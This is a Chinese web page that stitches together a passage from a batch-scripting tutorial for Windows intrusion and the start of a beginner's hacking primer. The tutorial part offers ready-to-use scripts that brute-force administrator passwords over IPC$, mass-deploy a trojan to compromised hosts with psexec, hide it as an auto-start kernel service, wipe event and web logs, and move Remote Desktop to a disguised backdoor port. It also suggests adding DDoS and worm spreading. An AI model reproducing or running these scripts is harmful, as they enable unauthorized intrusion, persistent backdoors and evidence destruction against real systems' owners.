i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令-- for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable) @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。 而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。 delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。 代码雏形: --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- @echo off @if "%1"=="" goto usage @for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k @goto end :usage @echo run this batch in dos modle.or just double-click it. :end --------------- cut here then save as a batchfile(I call it main.bat ) --------------------------- ------------------- cut here then save as a batchfile(I call it door.bat) ----------------------------- @net use \\%1\ipc$ %3 /u:"%2" @if errorlevel 1 goto failed @echo Trying to establish the IPC$ connection …………OK @copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt @psexec \\%1 c:\winnt\system32\windrv32.exe @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt :failed @echo Sorry can not connected to the victim. ----------------- cut here then save as a batchfile(I call it door.bat) -------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 二.如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echo off if "%1"=="a" format a: :format @format a:/q/u/auotset @echo please insert another disk to driver A. @pause @goto fomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。 @echo off @net use \\1%\ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。 @if errorlevel 1 echo connection failed 怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3 三.如何使用组合命令(Compound Command) 1.& Usage:第一条命令 & 第二条命令 [& 第三条命令...] 用这种方法可以同时执行多条命令,而不管命令是否执行成功 Sample: C:\>dir z: & dir c:\Ex4rch The system cannot find the path specified. Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:51 *本站禁止HTML标签噢* . 2002-05-14 23:51 *本站禁止HTML标签噢* .. 2002-05-14 23:51 14 sometips.gif 2.&& Usage:第一条命令 && 第二条命令 [&& 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; Sample: C:\>dir z: && dir c:\Ex4rch The system cannot find the path specified. C:\>dir c:\Ex4rch && dir z: Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of c:\Ex4rch 2002-05-14 23:55 *本站禁止HTML标签噢* . 2002-05-14 23:55 *本站禁止HTML标签噢* .. 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 2 Dir(s) 768,671,744 bytes free The system cannot find the path specified. 在做备份的时候可能会用到这种命令会比较简单,如: dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup 如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :) 3.|| Usage:第一条命令 || 第二条命令 [|| 第三条命令...] 用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; Sample: C:\Ex4rch>dir sometips.gif || del sometips.gif Volume in drive C has no label. Volume Serial Number is 0078-59FB Directory of C:\Ex4rch 2002-05-14 23:55 14 sometips.gif 1 File(s) 14 bytes 0 Dir(s) 768,696,320 bytes free 组合命令使用的例子: sample: @copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt 四、管道命令的使用 1.| 命令 Usage:第一条命令 | 第二条命令 [| 第三条命令...] 将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。 sample: time /t>>D:\IP.log netstat -n -p tcp|find ":3389">>D:\IP.log start Explorer 看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。 2.>、>>输出重定向命令 将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。 sample1: echo hello world>c:\hello.txt (stupid example?) sample2: 时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录: 运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt, 这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中, 日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了. 这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行: CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能 发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如 果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。 3.< 、>& 、<& < 从文件中而不是从键盘中读入命令输入。 >& 将一个句柄的输出写入到另一个句柄的输入中。 <& 从一个句柄读取输入并将其写入到另一个句柄输出中。 这些并不常用,也就不多做介绍。 No.5 五.如何用批处理文件来操作注册表 在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后 门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操 作注册表.(我们可以用批处理来生成一个REG文件) 关于注册表的操作,常见的是创建、修改、删除。 1.创建 创建分为两种,一种是创建子项(Subkey) 我们创建一个文件,内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker] 然后执行该脚本,你就已经在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下创建了一个名字为“hacker”的子项。 另一种是创建一个项目名称 那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Invader"="Ex4rch" "Door"=C:\\WINNT\\system32\\door.exe "Autodos"=dword:02 这样就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下 新建了:Invader、door、about这三个项目 Invader的类型是“String Value” door的类型是“REG SZ Value” Autodos的类型是“DWORD Value” 2.修改 修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。 3.删除 我们首先来说说删除一个项目名称,我们创建一个如下的文件: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Ex4rch"=- 执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被删除了; 我们再看看删除一个子项,我们创建一个如下的脚本: Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 执行该脚本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已经被删除了。 相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。 samlpe1:如上面的那个例子,如想生成如下注册表文件 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Invader"="Ex4rch" "door"=hex:255 "Autodos"=dword:000000128 只需要这样: @echo Windows Registry Editor Version 5.00>>Sample.reg @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg @echo "Invader"="Ex4rch">>Sample.reg @echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg @echo "Autodos"=dword:02>>Sample.reg samlpe2: 我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容 易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为 windrv32.exe) @start windrv32.exe @attrib +h +r windrv32.exe @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll @echo "windsnx "=- >>patch.dll @sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe @regedit /s patch.dll @delete patch.dll @REM [删除DSNXDE在注册表中的启动项,用sc.exe将之注册为系统关键性服务的同时将其属性设为隐藏和只读,并config为自启动] @REM 这样不是更安全^_^. 六.精彩实例放送。 1.删除win2k/xp系统默认共享的批处理 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo preparing to delete all the default shares.when ready pres any key. @pause @echo off :Rem check parameters if null show usage. if {%1}=={} goto :Usage :Rem code start. echo. echo ------------------------------------------------------ echo. echo Now deleting all the default shares. echo. net share %1$ /delete net share %2$ /delete net share %3$ /delete net share %4$ /delete net share %5$ /delete net share %6$ /delete net share %7$ /delete net share %8$ /delete net share %9$ /delete net stop Server net start Server echo. echo All the shares have been deleteed echo. echo ------------------------------------------------------ echo. echo Now modify the registry to change the system default properties. echo. echo Now creating the registry file echo Windows Registry Editor Version 5.00> c:\delshare.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg echo "AutoShareWks"=dword:00000000>> c:\delshare.reg echo "AutoShareServer"=dword:00000000>> c:\delshare.reg echo Nowing using the registry file to chang the system default properties. regedit /s c:\delshare.reg echo Deleting the temprotarily files. del c:\delshare.reg goto :END :Usage echo. echo ------------------------------------------------------ echo. echo ☆ A example for batch file ☆ echo ☆ [Use batch file to change the sysytem share properties.] ☆ echo. echo Author:Ex4rch echo Mail:Ex4rch@hotmail.com QQ:1672602 echo. echo Error:Not enough parameters echo. echo ☆ Please enter the share disk you wanna delete ☆ echo. echo For instance,to delete the default shares: echo delshare c d e ipc admin print echo. echo If the disklable is not as C: D: E: ,Please chang it youself. echo. echo example: echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into : echo delshare c d e x y z ipc admin print echo. echo *** you can delete nine shares once in a useing *** echo. echo ------------------------------------------------------ goto :EOF :END echo. echo ------------------------------------------------------ echo. echo OK,delshare.bat has deleted all the share you assigned. echo.Any questions ,feel free to mail to Ex4rch@hotmail.com. echo echo. echo ------------------------------------------------------ echo. :EOF echo end of the batch file ------------------------ cut here then save as .bat or .cmd file --------------------------- 2.全面加固系统(给肉鸡打补丁)的批处理文件 ------------------------ cut here then save as .bat or .cmd file --------------------------- @echo Windows Registry Editor Version 5.00 >patch.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll @echo "AutoShareServer"=dword:00000000 >>patch.dll @echo "AutoShareWks"=dword:00000000 >>patch.dll @REM [禁止共享] @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll @echo "restrictanonymous"=dword:00000001 >>patch.dll @REM [禁止匿名登录] @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll @REM [禁止及文件访问和打印共享] @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\@REMoteRegistry] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll @echo "ShutdownWithoutLogon"="0" >>patch.dll @REM [禁止登录前关机] @echo "DontDisplayLastUserName"="1" >>patch.dll @REM [禁止显示前一个登录用户名称] @regedit /s patch.dll ------------------------ cut here then save as .bat or .cmd file --------------------------- 下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 @regedit /s patch.dll @net stop w3svc @net stop event log @del c:\winnt\system32\logfiles\w3svc1\*.* /f /q @del c:\winnt\system32\logfiles\w3svc2\*.* /f /q @del c:\winnt\system32\config\*.event /f /q @del c:\winnt\system32dtclog\*.* /f /q @del c:\winnt\*.txt /f /q @del c:\winnt\*.log /f /q @net start w3svc @net start event log @rem [删除日志] @net stop lanmanserver /y @net stop Schedule /y @net stop RemoteRegistry /y @del patch.dll @echo The server has been patched,Have fun. @del patch.bat @REM [禁止一些危险的服务。] @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll @echo "PortNumber"=dword:00002010 >>patch.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll @echo "PortNumber"=dword:00002012 >>patch.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll @echo "Start"=dword:00000002 >>patch.dll @echo "ErrorControl"=dword:00000001 >>patch.dll @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll @echo "ObjectName"="LocalSystem" >>patch.dll @echo "Type"=dword:00000010 >>patch.dll @echo "Description"="Keep record of the program and windows' message。" >>patch.dll @echo "DisplayName"="Microsoft EventLog" >>patch.dll @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll @echo "Start"=dword:00000004 >>patch.dll @copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe @REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] |
初级黑客必须掌握的基础知识--菜鸟宝典 最经典的黑客技术入门知识
| 第一节、黑客的种类和行为 以我的理解,“黑客”大体上应该分为“正”、“邪”两类,正派黑客依靠自己掌握的知识帮助系统管理员找出系统中的漏洞并加以完善,而邪派黑客则是通过各种黑客技能对系统进行攻击、入侵或者做其他一些有害于网络的事情,因为邪派黑客所从事的事情违背了《黑客守则》,所以他们真正的名字叫“骇客”(Cracker)而非“黑客”(Hacker),也就是我们平时经常听说的“黑客”(Cacker)和“红客”(Hacker)。 无论那类黑客,他们最初的学习内容都将是本部分所涉及的内容,而且掌握的基本技能也都是一样的。即便日后他们各自走上了不同的道路,但是所做的事情也差不多,只不过出发点和目的不一样而已。 很多人曾经问我:“做黑客平时都做什么?是不是非常刺激?”也有人对黑客的理解是“天天做无聊且重复的事情”。实际上这些又是一个错误的认识,黑客平时需要用大量的时间学习,我不知道这个过程有没有终点,只知道“多多益善”。由于学习黑客完全出于个人爱好,所以无所谓“无聊”;重复是不可避免的,因为“熟能生巧”,只有经过不断的联系、实践,才可能自己体会出一些只可意会、不可言传的心得。 在学习之余,黑客应该将自己所掌握的知识应用到实际当中,无论是哪种黑客做出来的事情,根本目的无非是在实际中掌握自己所学习的内容。黑客的行为主要有以下几种: 一、学习技术: 互联网上的新技术一旦出现,黑客就必须立刻学习,并用最短的时间掌握这项技术,这里所说的掌握并不是一般的了解,而是阅读有关的“协议”(rfc)、深入了解此技术的机理,否则一旦停止学习,那么依靠他以前掌握的内容,并不能维持他的“黑客身份”超过一年。 初级黑客要学习的知识是比较困难的,因为他们没有基础,所以学习起来要接触非常多的基本内容,然而今天的互联网给读者带来了很多的信息,这就需要初级学习者进行选择:太深的内容可能会给学习带来困难;太“花哨”的内容又对学习黑客没有用处。所以初学者不能贪多,应该尽量寻找一本书和自己的完整教材、循序渐进的进行学习。 二、伪装自己: 黑客的一举一动都会被服务器记录下来,所以黑客必须伪装自己使得对方无法辨别其真实身份,这需要有熟练的技巧,用来伪装自己的IP地址、使用跳板逃避跟踪、清理记录扰乱对方线索、巧妙躲开防火墙等。 伪装是需要非常过硬的基本功才能实现的,这对于初学者来说成的上“大成境界”了,也就是说初学者不可能用短时间学会伪装,所以我并不鼓励初学者利用自己学习的知识对网络进行攻击,否则一旦自己的行迹败露,最终害的害是自己。 如果有朝一日你成为了真正的黑客,我也同样不赞成你对网络进行攻击,毕竟黑客的成长是一种学习,而不是一种犯罪。 三、发现漏洞: 漏洞对黑客来说是最重要的信息,黑客要经常学习别人发现的漏洞,并努力自己寻找未知漏洞,并从海量的漏洞中寻找有价值的、可被利用的漏洞进行试验,当然他们最终的目的是通过漏洞进行破坏或着修补上这个漏洞。 黑客对寻找漏洞的执著是常人难以想象的,他们的口号说“打破权威”,从一次又一次的黑客实践中,黑客也用自己的实际行动向世人印证了这一点——世界上没有“不存在漏洞”的程序。在黑客眼中,所谓的“天衣无缝”不过是“没有找到”而已。 四、利用漏洞: 对于正派黑客来说,漏洞要被修补;对于邪派黑客来说,漏洞要用来搞破坏。而他们的基本前提是“利用漏洞”,黑客利用漏洞可以做下面的事情: 1、获得系统信息:有些漏洞可以泄漏系统信息,暴露敏感资料,从而进一步入侵系统; 2、入侵系统:通过漏洞进入系统内部,或取得服务器上的内部资料、或完全掌管服务器; 3、寻找下一个目标:一个胜利意味着下一个目标的出现,黑客应该充分利用自己已经掌管的服务器作为工具,寻找并入侵下一个系统; 4、做一些好事:正派黑客在完成上面的工作后,就会修复漏洞或者通知系统管理员,做出一些维护网络安全的事情; 5、做一些坏事:邪派黑客在完成上面的工作后,会判断服务器是否还有利用价值。如果有利用价值,他们会在服务器上植入木马或者后门,便于下一次来访;而对没有利用价值的服务器他们决不留情,系统崩溃会让他们感到无限的快感! 第二节、黑客应掌握的基本技能 从这一节开始,我们就真正踏上学习黑客的道路了,首先要介绍的是作为一名初级黑客所必须掌握的基本技能,学习这可以通过这一节的阅读了解到黑客并不神秘,而且学习起来很容易上手。为了保证初学者对黑客的兴趣,所以本书采取了循环式进度,也就是说每一章节的内容都是独立、全面的,学习者只有完整的学习过一章的内容,才能够进而学习下一章的内容。 一、了解一定量的英文: 学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。 二、学会基本软件的使用: 这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。 三、初步了解网络协议和工作原理: 所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。 四、熟悉几种流行的编程语言和脚本: 同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。 五、熟悉网络应用程序: 网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果! 第三节、网络安全术语解释 一、协议: 网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换,这种物理设备包括最常见的电缆、光缆、无线WAP和微波等,但是单纯拥有这些物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。 这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机理的目的。 每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全问题而被黑客利用。 对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。 二、服务器与客户端: 最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持,而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它们之间具有相同的功能,对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。 从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。 三、系统与系统环境: 电脑要运作必须安装操作系统,如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、WindowsNT等,这些操作系统各自独立运行,它们有自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。 不同的操作系统配合不同的应用程序就构成了系统环境,例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息;再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器,通过远程ftp登陆可以获得系统上的各种文件资源等。 四、IP地址和端口: 我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目,都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。 每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地址)的请求后,服务器会将应答信息传送到伪IP地址上,从而造成网络的混乱。当然,黑客也可以根据IP地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。 接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户端请求。 网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现,即“隐藏的端口”,故“后门”。 每一台电脑都可以打开65535个端口,因而理论上我们可以开发出至少65535种不同的网络服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客户端和服务端都使用的是80号端口,进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。 五、漏洞: 漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号;Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等…… 总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”,他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才对黑客有了畏惧和敌视的心理。 六、加密与解密: 在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到,如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。 网络上最长使用的是设置个人密码、使用DES加密锁,这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷,黑客也在寻找破解这些系统的种种办法。 可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好,将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行,本书将会侧重学习“漏洞”方面的知识。 七、特洛伊木马: 特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊木马与病毒区分开 第四节、常用黑客软件用途分类 